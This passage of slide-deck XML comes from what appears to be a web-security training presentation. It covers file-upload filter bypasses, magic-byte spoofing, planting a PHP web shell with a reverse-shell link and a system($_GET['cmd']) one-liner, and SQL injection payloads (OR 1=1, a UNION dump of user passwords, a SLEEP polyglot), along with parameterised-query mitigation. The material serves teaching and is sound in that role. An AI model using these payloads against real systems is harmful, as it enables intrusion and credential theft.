              </a:rPr>
              <a:t>shell.jpg.php</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Null Bytes: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell.php%00.jpg</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="09CECE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Alternative file extensions: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.phtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.jspf</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1100"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="700"/>
              <a:t>(See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="700" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://null-byte.wonderhowto.com/how-to/bypass-file-upload-restrictions-web-apps-get-shell-0323454/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="700"/>
              <a:t> for more!)</a:t>
            </a:r>
            <a:endParaRPr sz="700"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Magic Bytes</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>head -c 20 /path/to/safe_file | xxd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> to see magic bytes (first 4-8)</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>head -c 8 /path/to/safe_file &gt; /path/to/shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> to add bytes</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nano /path/to/shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cat /path/to/existing_shell &gt;&gt; /path/to/shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> to add shell cod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>e</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ile /path/to/shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> to check type</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>List of signatures: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/List_of_file_signatures</a:t>
            </a:r>
            <a:endParaRPr sz="1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Gaining a Web Shell</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88" name="Google Shape;88;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="379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200"/>
              <a:t>PHP Reverse Shell</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/pentestmonkey/php-reverse-shell</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>Change the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$port</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="EB3C68"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>Then just load the script by visiting the page!</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>You may have to enumerate the upload location - gobuster can help!</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>Sometimes error messages can disclose the webroot path on the server, or you can find it on /phpinfo.php</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>PHP Arbitrary Code Execution</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>&lt;?php system(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$_GET[‘cmd’]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>); ?&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>Visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/path/to/shell?cmd=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>arbitrary linux command</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="EB3C68"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>What about other languages?</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200"/>
              <a:t>Web Shells are available in Python, JSP (Java), Ruby, and pretty much any language you can think of</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/tennc/webshell</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://github.com/TheBinitGhimire/Web-Shells</a:t>
            </a:r>
            <a:endParaRPr sz="1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idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="390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100"/>
              <a:t>Example Query Structure</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Login: SELECT * FROM users WHERE username = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$_GET[‘username’]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> AND password = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$_GET[‘password’]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Comment Search: SELECT name, text, date FROM comments WHERE text LIKE “%” . </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$_GET[‘query’]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> . “%”;</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>The Vulnerability:</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>User input is passed directly to the query and treated as SQL code</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>This can cause arbitrary SQL to be executed:</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>SELECT * FROM users WHERE username = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“injected” OR 1=1; --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AND password = “whatever”;</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>SELECT name, text, date FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>comments WHERE text LIKE “%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>who cares%” UNION SELECT id, username, password FROM users;--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%”;</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Mitigating SQLI</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>PARAMETERISED QUERIES (aka prepared statements) - these ‘fix’ the SQL statement and add variable values before execution</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>E.g., in PHP:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$stmt = mysqli_prepare($dbc, "SELECT * FROM users WHERE username = ? AND password = ?");</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>In general: don’t treat user input as code - treat it as a parameter</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Don’t bother with white/blacklists - there are plenty of examples of them going wrong</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94" name="Google Shape;94;p18"/>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SQL Injection -  A Quick Recap</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9"/>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Advanced SQL Injection</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="Google Shape;100;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="393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100"/>
              <a:t>Detecting SQLI</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Look for parts of the site that may </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>interact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> with a database: a login form, a search function, a form that may insert new data</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Try fuzzing for an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t> by using a polyglot (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SLEEP(1) /*’ or SLEEP(1) or’” or SLEEP(1) or “*/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>), or calling functions to determine the SQL Engine being used</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>Enumerating the Database</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>If you can arbitrarily select data (for example, with a UNION attack), you can use functions to enumerate the database</a:t>
            </a:r>
            <a:endParaRPr sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>For example, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT id, name, quantity, price FROM products WHERE name LIKE “%who cares%” UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user(), database(), session_user(), current_user()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;-- %”; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1100"/>
              <a:t>will tell you the name of the database and user information</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
